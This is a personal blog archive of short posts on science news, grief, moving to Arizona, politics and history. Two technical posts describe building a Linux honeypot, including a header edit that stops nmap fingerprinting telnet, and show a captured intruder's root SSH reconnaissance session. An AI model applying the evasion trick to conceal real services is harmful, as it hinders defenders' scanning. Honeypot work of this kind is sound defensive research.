A Day in the Life of...

Canadians Reverse Alzheimer's Memory Loss

2011-12-04T18:56:00.004-06:00

So, is Alzheimer's one disease, or two different diseases? It seems that the Canadians have reversed Alheimer's memory loss via deep brain stimulation. This suggests that some Alzheimer's patients are possibly curable with this technique.

Loss

2011-10-15T12:32:00.003-05:00

I am learning about loss this month it seems. I found out that a teacher, Jerry Samuel Workman, who was like a father to me was dying of stage 4 colorectal cancer September 24. I had a second date that day with a wonderful woman I had met the previous weekend. The two dates that we had were happy affairs, but she was going to San Diego for a week to visit her sons and make some money on some jobs. I drove out to Pecos, TX where I grew up to see him, tell him I loved him, and say goodbye on October 1st. He died on October 6, 2011. I drove back to Pecos, TX for his memorial service, October 8th. That was a sad day. The world has lost a good man who was an excellent educator who helped build a better world and better people. The woman has not returned any emails, texts, or phone calls. It's been almost three weeks now. Chances are I won't see her again which is heartbreaking because she was a sweet, wonderful woman who was a lot of fun to be with. She was very wise, but she didn't realize how wise she was. So, I've lost a man who had a profound effect on my life and probably a woman who brought out the best in me as much I brought out the best in her.

Alzheimer's Disease Might Be Incurable

2011-10-06T18:59:00.003-05:00

Recent findings suggest that Alzheimer's might be an infectious prion disease. Why it's taken so long for someone to think of and perform this experiment is beyond me, but now someone has. If these results hold up, then I am not sure if progress will be made or not in curing Alzheimer's disease. Prion diseases are diseases where a protein causes correct copies of itself to fold in a different conformation that is pathogenic and harmful to the cells. Prion diseases in mammals tend to affect the brain and lead to death. They are not curable currently. I know that people are trying to find drugs that reverse the folding allowing the proteins to resume their normal function, but I know of no significant results of that strategy yet.

However, knowledge is a good thing. If we know that a misfolded protein is the cause of Alzheimer's then we should be able to find out what causes the misfolding and which people will be susceptible. Alternatively, there could be two or more versions of Alzheimer's, since there is an inherited version of the disease. In the inherited form, the mutant variant of the protein may be able to misfold spontaneously and cause the disease de novo. In the other form, a person may have to ingest contaminated meat or animal products to get the disease. Those affected may have another variant of the protein as well.

Until the results are reproduced and verified independently, people should not worry. If they are verified, then Alzheimer's research will be turned on it's ear, but then, real progress can then be made.

Effects of Corruption on the Stock Market and Other Markets

2011-08-30T21:30:00.001-05:00

An interview with Barry Ritholz. He pulls no punches.

One Must Look for Beauty

2011-08-16T21:46:00.002-05:00

I was talking to a friend the other day and she said something profound. She said, "One must look for beauty here". I live in a desert now and it is rather harsh and rugged. There is beauty all around us, but one must look closely and pick it out. A flower here, a flower there. A mockingbird singing. It is likely that way in the human world as well. One must look for beauty. While everyone is beautiful within, many hide their inner beauty because they've been taught to do so for whatever reason. Or, they are angry, sad, or upset for any number of reasons, especially in these troubling times. We are all flowers. Some bloom early, some bloom in midlife, and others bloom in late life. Many never bloom at all. But, one should try to find the beauty in another. After all, it was once there when the person was a babe.

It's Not a Deficit Crisis. It's a Jobs Crisis.

2011-07-31T14:27:00.002-05:00

Robert Reich explains Ben Sargent's political cartoon.

Pray for Norway

2011-07-30T12:06:00.001-05:00

Pray for Norway

The Gates of Paradise

2011-07-10T15:05:00.002-05:00

Most people suffer psychologically. Our wants and desires lead us to temporary pleasure and generally longer term pain. Heaven and hell are created in our minds generally. I am not saying that there is not physical suffering because there is and it is widespread in some parts of the world. But in the developed world, most people's immediate needs are met. We have food, shelter, and relative comfort. The following Zen koan illustrates the impact of psychological suffering.

A soldier named Nobushige came to Hakuin, and asked: "Is there really a paradise and a hell?"

"Who are you?" inquired Hakuin.

"I am a samurai," the warrior replied.

"You, a soldier!" exclaimed Hakuin. "What kind of ruler would have you as his guard? Your face looks like that of a beggar."

Nobushige became so angry that he began to draw his sword, but Hakuin continued: "So you have a sword! Your weapon is probably much too dull to cut off my head."

As Nobushige drew his sword Hakuin remarked: "Here open the gates of hell!"

At these words the samurai, perceiving the master's discipline, sheathed his sword and bowed.

"Here open the gates of paradise," said Hakuin.

Making Fun of Something Which is Not Inherently Funny

2011-07-10T10:04:00.001-05:00

I'm going to be ill. Two tier justice in play.

Why Obama Disappoints

2011-06-29T19:14:00.002-05:00

"I stand for nothing!"

Never Have Seen This Forecast Before

2011-06-17T16:26:00.001-05:00

Dreary

Just Moved to Arizona

2011-06-15T16:45:00.006-05:00

I've been living in Arizona for the last 6 months, pretty much living out of a suitcase and what my car would carry. I had planned to move back to Dallas because it seemed that my position was going away. I lost my job and gained a new one all on the same day, June 3, 2011. I asked for two weeks off without pay and after a whirlwind week, moved all my stuff from Dallas to Sierra Vista, AZ.

Man, am I tired. I drove out of Dallas at 3:00 A.M. on Saturday to avoid traffic. I passed a gas well in Haltom City, Texas on SH-121 in Ft. Worth. I never expected to see a gas well near downtown Ft. Worth. I stopped at my sister's in Odessa, TX. I unloaded the truck Monday after driving from West Texas Sunday. I'm taking today off from unpacking.

I put 995 miles on the rental truck and had to tow my car behind it. The truck almost overheated in Arizona. Southeastern Arizona is a lot like West Texas, but there's no oil and gas, and the agriculture is limited to ranching. This region is a part of the same desert as the Trans-Pecos where I grew up, but the cactus are different. Sierra Blanca, Texas resembles Sierra Vista, Arizona in flora and microclimate. I tried to escape the Chihuahuan Desert and now I am kind of back after being gone for 31 years. If you can't say anything nice, don't say anything at all. I sure will miss Dallas and all the lovely rain, thunderstorms, and greenery.

Huachuca Mountains Are Aflame

2011-06-15T16:36:00.004-05:00

These are pictures of the Monument wildfire taken from the Walmart parking lot in Sierra Vista, AZ. You are seeing the Huachuca Mountains burning.

Why We Celebrate Memorial Day

2011-05-29T20:49:00.002-05:00

We celebrate Memorial Day to remember men like Captain Waskow. Henry T. Waskow was killed on Monte Sammucro. Here is another column about World War II veterans. As Samuel Fuller, another WWII veteran said, "The only glory in war is survival."

Bill Mauldin: A Tribute to Fighting Infantrymen

2011-05-29T20:41:00.005-05:00

Able Fox Five to Able Fox. I got a target but ya gotta be patient.

Here's Ernie Pyle's column about Bill Mauldin.

Elites in the U.S. and Britain

2011-05-29T02:35:00.005-05:00

How our elites are behaving, though this comparison is likely an insult to twits. They steal from the poor and give to the rich! Stupid bitch! Dumb, dumb, dumb, dumb, dumb, dumb, dumb, dumb, dumb!

Malthus Revisited

2011-05-24T21:50:00.002-05:00

The most important problem humanity faces is addressing loss of knowledge and resources with each succeeding generation. As each generation dies, knowledge and experience is lost. Each succeeding generation will become progressively poorer as commons are lost or degraded, species are extinguished, agricultural lands are degraded, and the necessities become more and more scarce. Each succeeding generation will also forget how much poorer it is compared to the previous generation since much of that experience and knowledge is lost. And, until some limiting factor is reached, the population will continue to double within a human lifetime. The oceans are almost fished out now ( who would have thought? ). The cod of today are puny and rare compared to the cod of 50-100 years ago. There will come a point where water, food, and energy will become limiting unless desalination and energy generation become cheaper. The environment will degrade and civilization will collapse as people fight over what remains. Economists have a poor track record of assigning proper value to commons and resources. Economics is also an incredibly shortsighted discipline. The future could be different assuming we can limit population and mine outer space since the resources of the solar system dwarf the resources of our planet, but that assumes we have cheap power sources since leaving the planetary gravity well is very expensive. Population growth and society depend upon plentiful energy, water, food, and materials. But, current trends will prove Malthus correct within 50-100 years or so, unless people focus on the long term rather than the short term. If you think times are bad now, just wait another 25-50 years.

An Example of the Law Of Unintended Consequences With Deleterious Effects

2011-05-21T15:09:00.005-05:00

Hindus worship sacred animals and will not kill or eat them since they are servants or manifestations of their gods. When an animal becomes old or sick to the point of death, they give it an analgesic to deaden the animal's pain and suffering. This laudable spiritual practice has a horrid side effect however, and illustrates the Law of Unintended Consequences. When people give their animals the drug diclofenac to ease their suffering, and the animal subsequently dies, it is carrion for vultures. The vulture eats the carcass which has a low concentration of the drug in its tissues. The birds die shortly afterwards from what is likely renal failure. 99.9% of the oriental white-rumped vulture population has ceased to exist, and two other vulture populations have crashed about 97%. A partial drug ban is in place and the vulture populations are showing some signs of recovery. The death of all of these vultures has caused a major ecological problem. The feral dog population has increased resulting in an additional 50,000 human deaths a year from rabies. The leopard population has increased since the cats feed on the dogs. The lack of vultures has also made the disposal of bodies via Towers of Silence a useless custom to Zoroastrian believers who now must bury or cremate their dead. So, alleviating a little suffering can cause a lot more suffering if not done properly.

Arnie and Maria Divorce

2011-05-10T12:15:00.004-05:00

The comics and clowns will have a field day.

Hasta la vista, baby!
This marriage is terminated!
I won't be back!

Bad Manners and Unease

2011-05-05T21:47:00.005-05:00

Is it bad etiquette for a Navy SEAL to yell, "Boom! Head shot!"?

When the towers fell almost ten years ago, I wanted the individuals responsible to pay dearly. I was consumed with anger and revenge. While justice was served this past Sunday, I feel uneasy that others are celebrating. It feels wrong. I can't put a label to my unease, but it just doesn't seem right. It's not like life is back to normal in America. There's still too much fear and heavy handedness/bad security theater by the authorities. If we don't revert back to something approaching a pre-9/11 society, OBL will have the last laugh because he would have destroyed something precious in our society.

Osama was not the only casualty of the operation. It looks like American-Pakistan relations is a bigger casualty than bin Laden. It's difficult to believe that he wasn't being shielded by elements of the Pakistani government or intelligence community.

Armadillos Transmit Leprosy to Humans

2011-04-27T20:37:00.002-05:00

It's been known for some time that armadillos are carriers of leprosy. Now there is proof that infected armadillos can transmit leprosy to humans. Before you panic, leprosy is very rare.

North and West Texas Goes Poof!

2011-04-10T17:09:00.005-05:00

There is a 25,000 acre brush fire around Fort Davis, Texas. The fire started south of town around Highway 17 and is spreading east. My Dad lives west of the state park off of Highway 118. There is no electricity since the fire destroyed power lines. It is said that forty structures, likely houses, have been destroyed.

There is a worse fire burning in far North Texas that is about 165 square miles in size. There's likely no relief in sight. It is thought that a pipe cutter started the North Texas fire. The cause of the Fort Davis fire is unknown, but it's likely some idiot disposed of a lit cigarette butt. Texas had a rather wet year last year and an extremely dry winter and spring, so there was lots of dry vegetation ready to combust.

NHK Reports That the Exposed Fukushima Workers Received Fairly Low Doses

2011-03-29T17:12:00.005-05:00

NHK World has reported that the workers who were exposed Sunday received less than 150 mSieverts. Two men were standing in water up to their ankles and that all three received beta radiation burns. None of the workers had ingested or inhaled any radioisotopes. Had the men been wearing waterproof Wellington boots (rain boots), they would likely not have even suffered any significant exposure. (Beta particles can be blocked by clothing. The higher the energy, the thicker protection one needs.) These men came in contact with the radioactive water which shouldn't have happened. Shame on TEPCO for not providing adequate clothing and protective gear to their employees. Shame on the MSM for over-exaggerating the workers' exposure.

What Happened to My Country and Its Charity?

2011-03-20T15:47:00.007-05:00

When I was growing up, America had a space program and we were going to the Moon. Neil Armstrong landed on the Moon in 1969 when I was seven years old. We were the wealthiest country in the world and we could do almost anything we could conceive of. We always sent in emergency supplies and aid when disasters struck. Our officials seemed knowledgeable and informed. So, I was surprised and disheartened when I learned that Americans were leaving Tokyo out of fear and that our government was making things worse by fear mongering about the nuclear incident at Fukushima.

Nuclear Regulatory Commission Chairman Gregory Jaczko received a Ph.D. in theoretical particle physics, but went to work for Congress and the Senate after receiving his doctorate. He used to be Senator Harry Reid's science policy advisor. Reid was instrumental in closing the Yucca Mountain Nuclear Waste Repository after $13.5 billion dollars had been spent on building it. So, now nuclear waste is stored on site at each nuclear facility. So, we have an NRC Chairman who has actually made the nuclear industry less safe prior to becoming chairman. Then he states publicly that the water in one of the Fukushima spent fuel pools had drained away leaving the fuel rods completely exposed. Not only did he have bad intelligence, but he was spreading fear. So much for informed government.

Then there is the meme being promoted not to donate to charities to help Japan. One who has spread this meme is Felix Salmon. They don't require our money or our aid it seems. But then, we get this news that people are starving in the devastated areas. There's not enough emergency rations coming in.

Usually we send aid in directly through the our military. The U.S. Navy would be a good choice because it has the most expertise in using nuclear reactors and the dangers inherent with using that technology. But it doesn't appear that our navy will helping the Japanese at Fukushima directly. We seem to be delivering food supplies and other aid, but are being hampered by poor weather.

Now we have twits buying iodide pills on the West Coast. They are paying $140 for a $6 bottle of pills. This is sheer insanity and beyond all rationality. Are people that ignorant and scared? They have the Internet as a resource if they can't trust the media for information.

It's okay to have nuclear weapons which can kill millions, but not okay to have nuclear power which could wean us from foreign oil and be used to destroy said weapons as fuel. It's okay to fight and defend our oil suppliers in the Middle East rather than be energy independent. What is the true cost of a barrel of oil when the costs of Iraq and Afghanistan are factored in? How much American blood is spilled to keep our oil companies and Arab dictators happy? What happened to our charity to our own people and others? We are the country who created the Marshall Plan to rebuild Germany and Japan. We created Social Security and Medicare to help our elderly and poor. Does any of this make sense? What happened to my country which professes to be Christian? Who stole it? I want it back.

Defeating the Most Dangerous Form of Genius

2011-03-10T21:58:00.004-06:00

I suppose genius depends upon how you define the word. It's difficult to defeat an intellectual or spiritual genius because good ideas have a way of spreading over time. It is easy to defeat such a person in the short term by denying them resources or killing them, but the genius and his ideas are likely to outlast your empire. Archimedes is the archetype for this type of genius, and he caused the Romans no end of trouble in their attempts to take Syracuse. (Yeshua ben Yosef would be the spiritual equivalent.)

Then, there's military genius. Rome only defeated Hannibal by using its vast resources to limit his army's movements and his options through the efforts and strategy of Fabius Maximus. The Roman elite* didn't like his strategy and advice at first and because of their pride and deafness, several Roman armies (and many of those elites) paid dearly. Eventually, they had a commander who could defeat Hannibal in combat, Scipio Africanus. Hannibal killed or defeated many competent Roman generals and their armies because they were not his equal. In a way, Hannibal selected his own equal in an opponent such as Scipio Africanus. The other examples of such military genius are: Gengis Khan, Stonewall Jackson, and Erwin Rommel. Gengis Khan conquered a vast empire and was essentially undefeated in battle. Stonewall Jackson kept the Southern cause alive, but was accidentally killed by his own men. The Civil War might have lasted longer had Stonewall lived, but the result would not have been different due to the overwhelming resources of the North. The same is true for Rommel. Had Hitler given him the resources he'd have needed, the North African campaign would have lasted longer and perhaps have ended differently. But, Germany was doomed once Hitler took on the USSR and then declared war on the United States. A Rommel or a Hannibal can not win a war of attrition against a better equipped foe, but if such genius has the material wealth and manpower on his side (like Khan), only death can stop him. I wonder if we are selecting for our own Taliban fox in Pakistan at this time. We are certainly killing enough of their leaders. We are likely selecting for those smart enough to survive and thrive amid drone strikes, hunter-killer teams, and other modern methods of hunting and killing human beings. Are we creating our own Hannibal, and what will the human cost be when he is unleashed with enough resources to cause mayhem? Heaven help us if our resolve and determination break before the Taliban's does because an Islamic military genius with a nuclear weapon is very bad indeed.

We don't have the modern American equivalent of a Hannibal. All of our general officers say that they are, but likely the Roman generals thought that they were Hannibal's equal as well until they met him and his army in battle. Bravery and competency are not enough to thwart military genius. Hannibal killed 50,000 Romans in a single day's combat. The modern equivalent of a Hannibal is the total annihilation of an entire corp or more, and many more, if nuclear weapons are used.

* The elites blamed the soldiers for many of the failures and exiled them to Sicily even though the failure lay with the elites themselves. It seems that some things never change. We are seeing common people (homeowners and teachers) being blamed for the failures of elite financial and public institutions. The elites who are really to blame are promoted or allowed to continue their bad policies. It seems that America is the new Rome, and we are rapidly approaching the death of the American republic. The Roman republic could not withstand the rise of two or more powerful oligarchs. America has at least four and they are consolidating and increasing their power.

Catch and Release Gone Bad

2011-03-02T22:12:00.003-06:00

Catch and release gone horribly wrong. It turns out that bull sharks steal fishermen's catches in the Breede River in South Africa. Bull sharks tolerate freshwater extremely well. Here then, are two documented accounts of different sharks eating caught fish. It is likely the hooked fish's distressed behavior is attracting the sharks.

Military Technology Rhymes

2011-03-01T20:47:00.003-06:00

“History doesn't repeat itself - at best it sometimes rhymes”
- Mark Twain

The same goes for concepts as well. The Japanese discovered that silken capes or banners which billowed could stop arrows. They created silken armor called horo. The silken cloth would billow behind a galloping warrior like a sail. Horo was tested recently and 70% of the arrows were stopped by the silken sheet. Since the rider would be wearing armor, the remaining arrows would likely be stopped before any damage could be done. We see the same concept in play with Schurzen, skirt armor for tanks and armored vehicles, to stop AT, HE, and eventually, shaped charge antitank weapons. In essence, the Germans discovered that 5 millimeter of armor provided quite a bit of protection to a tank from modern infantry "arrows". So, we see the same concept used for protecting armored calvary at different times in military history.

Three Decent Posts from Tom Ricks

2011-02-21T18:13:00.003-06:00

It seems the Germans believe that George Tenet is a liar who ruined Colin Powell's reputation. Iraqis who helped us are being rounded up. It also seems that the Bush administration got scammed. I doubt the latter is unique. The Obama administration is likely being scammed as well since many of the same gullible people are holdovers from the Bush administration.

Christians and Atheists Oppressing Buddhists

2011-02-08T20:58:00.003-06:00

Tom Ricks points out that Buddhists were oppressed and killed by both sides in Vietnam.

Liberty Design Looks a Lot Like Ares I

2011-02-08T20:11:00.007-06:00

The Liberty rocket design looks a lot like the canceled Ares I. This is probably no coincidence. One would think that the private sector would be a bit more original, but one way to revive the canceled Ares I would be to have a private company finish the development and called it something else. Liberty will suffer from similar vibration problems that Ares had because they are using a similar solid rocket booster design for the first stage. The U.S. could do better if our engineers were given enough money to do their jobs. Our space program seems to be on life support and American space policy is a national disgrace. If the state of our space program now is similar to the state of the Russian program in the 1990's, then that indicator alone means that our nation could be economically failing like the U.S.S.R. I wonder what The United States of America is becoming? Evidently, we are essentially abandoning manned space flight and manned space exploration. We may be abandoning robotic exploration if the current projects go over budget. The James Web Space telescope is gobbling up other mission's funding even now. Will suborbital or orbital space flight just be a thrill ride for bored billionaires in the future?

Keyhole Bird Launched

2011-02-03T15:16:00.002-06:00

A Keyhole satellite was launched from Vandenberg in January. Strategy Page has a decent post that suddenly dissolves into sour grapes and bile.

The guts of an optical spysat are the optics and sensor packages. Incremental improvements in optics, solid state electronics, and batteries go a long way towards decreasing weight, improving sensor resolution and capabilities, as well as performance. These improvements allow more fuel to be carried resulting in a longer lifespan. Thus, the KH12 is rendered obsolete before it gets off the drawing board while the KH11 gets better over time until the latest satellite doesn't resemble the first in series except for form.

Yes, $10 billion dollars were wasted, but the banks wasted $trillions and ruined a lot of lives. The government doesn't look so bad in retrospect when compared to what private finance can do with a bit of greed and fraud. DOD program managers don't look as inept as FED economists or TBTF bank CEOs.

Gurkha 40, Thieves Zero

2011-02-03T15:01:00.003-06:00

According to this Strategy Page article, a gurkha named Bishnu Shrestha, stopped forty bandits from robbing an Indian train. While he brought a knife to a gun fight, he was fighting in the close quarters of a train car which gave him the advantage. He killed three, wounded eight, and drove the rest off. He would not have resisted being robbed except the bandits were going to rape an 18 year old woman sitting next to him. The attempted rape was going too far. Perhaps they should have more armed Gurkhas on Indian trains.

Obama Will Lose the 2012 Election Most Likely

2011-01-30T13:45:00.007-06:00

Yves Smith has a great post that shows $8 out of every $10 stimulus dollars goes overseas because of bad American economic policies. There will not be any decent job creation or relief from high unemployment until corporations' legal incentives are altered by lawmakers so that it's more profitable for them to create American jobs than Chinese jobs. It turns out that Apple's iPhone contributes $2 billion dollars to the annual trade deficit. Apple could move the production to America and still make 50% profit on their product, but they make more profits by making everything in China.

Some Democrats are waking up to these uncomfortable facts, but Obama is not. His choices in people and policies show that he's pro-corporate. But pro-corporate is not pro-Main Street. The wealth to the CEOs and executives will not trickle down to the average American worker because that form of American job creation is gone due to free trade agreements allowing the outsourcing of jobs and manufacturing. With R&D migrating overseas as well, the only innovation will come from government sponsored research via NIH, DOE, and DOD. Ideas know no boundaries and manufacturers go where the production costs are lowest unless other factors raise those costs. Germany has figured out a solution. Other countries have as well. The solutions aren't painful except to those who won't be as richly compensated as they are now. But, those people are already wealthy and set for life. Why is selfishness praised and rewarded these days by our own leaders covertly and overtly? Selfishness, that one desire or need, undermines just about every human endeavor or system sooner or later. We've seen this play out in 1987 and in 2007-2008 in real estate and banks. We've seen it play out in 2000 with the telecoms and Enron. The difference is that no one has been punished this time around for bad behavior and breaking the law. Such cynical, brave men who hide behind banks and corporations while they loot and steal with impunity leaving chaos in their wake while the majority of our leaders turn a blind eye.

The problem is that we are all in this together. If we don't take care of one another, the country will fall into ruin. I, for one, do not want to see these United States become a banana republic.

Tucson

2011-01-09T22:37:00.004-06:00

I am not going to comment about the Tucson shooting that happened yesterday. What concerns me is if it becomes a trend to kill Democrats who oppose Republican or Tea Party policies. Hopefully, this is a single tragic event and not the start of Democrat hunting season. The woman who was shot was not a liberal, but a conservative. But, she was obviously shot because she was a Democrat. It's a miracle that she survived. It's sad, tragic, and stupid, and my condolences to the survivors and witnesses. Let's hope that assassination will not become a fad or fashion here like it is in some failed states and banana republics.

DailyZen Quote of the Day

2011-01-02T17:09:00.000-06:00

Do not be concerned with who is
wise and who is stupid.
Do not discriminate the
sharp from the dull.
To practice whole-heartedly
is the true endeavor of the way.
Practice-realization is not
defiled with specialness;
it is a matter for every day.

- Dogen (1200-1253)

Settling In

2010-12-29T19:30:00.002-06:00

I have a second apartment. I've settled in to the new job and the cats have settled in. The new year is just around the corner. The new job is a blessing thus far it appears. It's definitely not boring. There's not a lot to do in this small town. One has to use one's imagination and be creative in small towns. There are fewer distractions and events unlike a large city. Not much else to say at this time.

Changes

2010-12-04T21:39:00.006-06:00

On November 15th, I received a call from a recruiter. He was looking for a contractor, really a subcontractor for a Linux security position in Arizona. By Wednesday, I had passed the two phone interviews, though it was obvious that they were desperate for a body. The money was good, $50/hour rate for the first three months. It may go down a bit if I am hired as a contractor instead of being a subcontractor after that period, but it beats unemployment benefits. I have been unemployed for over 15 months and it was beginning to wear me down. There are few IT jobs in the DFW area and those that are available are in the defense or financial sectors. I don't have a clearance for the former and certain financial security qualifications for the latter. I start work Monday. I am not sure that this is the right move, but only time will tell if I have made a mistake or not. I plan to stay silent, do my job to the best of my abilities, and see what happens for the next 6 months.

Arizona is a rather ultraconservative state, not unlike much of Texas. If I can't have earnest discussions with my Dad over economic and political policies, then what chance do I have with a stranger almost a thousand miles away from my home in Dallas? I tried to tell my Dad that I didn't argue with him to win, but to make him think. I got a lecture from him about how he grew up poor, the struggle he's had all his life to earn money, and how life is all about survival. It's kind of sad. Dad is not starving. His house is paid for. I do not know if he is having trouble paying bills, but he does not appear to be. It is as if he still sees himself as economically poor in some way, or he's economically insecure. It may not be the retirement he envisioned, but it is the retirement he has.

I tried to tell him that these are scary times and that I'm scared as well. He tells me that I am reading the wrong things and wrong people rather than rebut my factual retorts. He doesn't believe me when I tell him that he's being manipulated by Fox News and that he shouldn't watch so much television. The corporations behind the media are pushing their own subtle agenda, especially in television, and it is not to help anyone but themselves. Television journalism has deteriorated severely since the Cold War ended. It is obvious. I tell him that the world will not end literally like Revelations states and that any of the Bible based sects believe at the end of any century. Psychological worlds may end, but not this planet until some time in the distant future billions of years from now. I know that nothing I say to my father matters. My arguments and convictions fall on deaf ears because his mind is made up. I know that whatever opinions I have will not matter in the long run. They are just fragments of one person's assessment of what he perceives. But, I was trained in academia to find the truth and to argue for the evidence and facts in a case. It is one way to learn, and old habits die hard. Unfortunately, I am beginning to understand that people will defend invalid ideas and theories, and ignore the evidence that contradicts their belief systems. I used to think that only ignorant, simple men were that foolish, but it appears to apply to supposedly intelligent and sophisticated men who should know better. We see this with elite economists, bankers, and politicians who appear to favor the Wealthy over the Middle Class and Poor. Such obstinance may be due to cynicism by the latter, however.

So, I tell myself that my political opinions don't matter in the hope that I won't open my mouth and get myself into trouble with my new employers. I can't afford to lose a job due to an idle comment even if it does not pertain to the job, does not break any laws, and is essentially free speech. Contractors are at will. They can be released on a whim. I must remember that almost all fears are illusions, but it doesn't hurt to be cautious in a new situation or job.

Was our galaxy a quasar recently?

2010-11-11T23:27:00.002-06:00

Was our galaxy once a quasar? Here's an APOD picture of Fermi data. Here's a really nice NASA animation.

Ubuntu, Apache, and Other Gotchas

2010-11-11T14:12:00.013-06:00

I have been spending the last week and half to two weeks creating a new honeypot. I had to set up a web server. With RedHat, one only edits /etc/httpd/httpd.conf to configure the Apache web server. Even the Apache Foundation's documentation only recognizes configuring httpd.conf. But when you are configuring a Debian based system, woe are you! The normal httpd.conf configuration is split up into several files even though httpd.conf is still there in the /etc/apache2 directory. There's /etc/apache2/ports.conf which sets the ports that the webserver listens on. There's /etc/apache2/conf.d/security for configuring ServerTokens and ServerSignature. There's /etc/apache2/sites-available for configuring virtual hosts. If one just edits httpd.conf, nothing happens because the other configuration files take precedence. This pain is spread out in other directories as well such as /etc/sysctl/conf.d or /etc/ufw. It's easier to configure a firewall from one script, but try to figure out what's going on between two or three different configuration scripts.

Then there's GCC 4.4. They cleaned up some include headers. When I was compiling a Qt4 program whose source I downloaded from the Internet, I got an "error: ISO C++ forbids declaration of 'uint8_t' with no type". I assumed that the problem was with missing Qt4 headers, such as QtNetwork, but adding an #include "<"QtNetwork">" header did not solve the problem. I found the solution in Debian bug report 505690. One has to add #include "<"stdint.h">" (header for the Standard C library) to the Qt4 code for it to compile.

Then there's telnet. I was trying to modify the telnet source code to evade a match with the nmap-service-probes database (e.g. grep "Linux telnetd" /usr/share/nmap/nmap-service-probes). The nmap database is matching telnet byte commands and not strings, so it's not immediately obvious how to fool nmap without delving into the telnet protocol. It turns out that you don't need to modify the telnet source code to fool nmap at all. You just need to change a variable definition in the /usr/include/arpa/telnet.h header file on the system you are compiling the source code on. Really obvious, huh! (NOT!) Once you have the binary, you can either change the definition back to what it was or install the binary on another system. What I did would result in my version of telnet being unable to fully communicate with normal versions of the program, but since nmap is matching telnet byte commands, one either has to alter a byte command's number or alter the sequence of commands. It's easier to alter the numeric code to fool nmap if you are building a honeypot. The system will be used as a trap, not for production purposes. So, if you need to run telnet on a Linux honeypot and you don't want nmap screaming "Linux" at the attacker during the enumeration phase, you need to change the X Display Location (TELOPT_XDISPLOC) byte command number in the following line

#define TELOPT_XDISPLOC 35 /* X Display Location */

Redefining TELOPT_XDISPLAYLOC will likely screw up telnet connections from a X11 display terminal, but you don't want attackers or anyone else to be using telnet anyway. It's okay for them to "try" to use it though. You'll also want to change the /etc/issue.net banner to something else or your header alteration will be for naught. By the way, always perform an apt-get build-dep source "program" before you perform the apt-get -b source "program" on a Debian based system or something is liable to break during the compile.

Then there's Java. I had to install a Java version of TightVNC on the honeypot. When I tried to connect via the Internet Explorer browser, I got this error:

load: class VncViewer.class not found.
java.lang.ClassNotFoundException: VncViewer.class
blah, blah, blah...

It's a rather common error. If you have this line:

Caused by: java.io.IOException: open HTTP connection failed, or
Caused by: java.net.ConnectException: Network is unreachable,

the cause is due to an IPv6 network setting in Linux. I first found the solution here, but the same documented workaround is detailed in bug 6342561. Unfortunately, that was not the error I got. The error I had was:

Caused by: java.io.IOException: VncViewer.class not found.

I had to copy the missing class to the root of the virtual host directory. Then the error changed to OptionsFrame.class not found. So, I copied all of the TightVNC class files (and one jar file) from /usr/share/tightvnc-java/ to the virtual host directory to be safe. Then, TightVNC worked. This was odd because if you install the TightVNC files directly from the binary archive into the virtual host directory, the class files are found in a classes subdirectory, i.e. /var/www/virtual-domain/classes. Since the default install is likely to fail with TightVNC in a virtual host directory, I wonder what the "real" default install is.

Roman Leatherman

2010-11-08T16:26:00.002-06:00

The Leatherman is a reinvention of a Roman invention. I wonder if prior art would negate any patents they hold?

The Prongs of Fear

2010-11-08T11:35:00.015-06:00

"Only in a deeply pathological society is reason a synonym for weakness."

Christopher Fettweis

Tom Ricks gives a synopsis of Professor Fettweis's latest essay. Here's one sling at media television news.

"Fear is an essential component of the business model of both CNN and Fox News, a necessary tool to keep fingers away from remote controls during commercial breaks. Voices of reason tend to spoil the fun, and may inspire people to see excitement elsewhere."

Ricks thinks a whole generation is pissed off.

"I think Baby Boomers as a class are pissed. They came to maturity during Woodstock, when they were going to show the world how to live and love. In maturity they would smoke a little weed, sit on the beach, and hold forth. Instead, they find themselves old, mocked by technology, threatened financially, having to work longer than expected -- and al Qaeda wants to blow them up. So I think we are in for some very cranky years of politics."

I believe that Mr. Ricks is being optimistic. He's missing a generation or three. Tail end baby boomers like me and those that follow my cohort, the Generation Y's and X's, are being screwed by terrible economic policies. Many boomers lost 40% of their retirement savings in the last crash, and due to the 2001 and 2008 Recessions, made little money on their retirement investments (about the same as inflation, 2%). If I'd put my money in the bank, I wouldn't have made anything on it, but I'd have lost less due to inflation than from Wall Street fraud and thieving of my mutual funds.

So, we have two prongs of the pitchfork of fear -- psychological fear for profit and distraction, and financial/economic fear for further profit and control. The fearful monster we all perceive is likely a figment of an overactive collective imagination. The people who profit are certain political and business leaders. They will not be that much different from the respectable people who supported Hitler on his rise to power. Who profited mightily from his Third Reich after German democracy died. Who escaped the physical suffering and death of millions of other less fortunate people. Scapegoats will be found and sacrificed to the mob in order to pacify its artificially created and stimulated fear. When will we start acting like adults instead of children being afraid of the darkness or terrorists lying in wait under the bed?

We pay millions to kill a Taliban insurgent - blood money that would be better spent on jobs. One of the prices of irrational fear I suppose. I wonder where the torch of anger is?

Romanian BlackHat Script Kid at Work

2010-10-28T12:36:00.004-05:00

Honeypot session capture of a successful ssh compromise by what looks like a script kiddie. The session did not last long enough to determine the attacker's skill level or abilities though.

sales:~# w
18:02:29 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ps x
PID TTY TIME CMD
5673 pts/0 00:00:00 bash
5677 pts/0 00:00:00 ps x
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
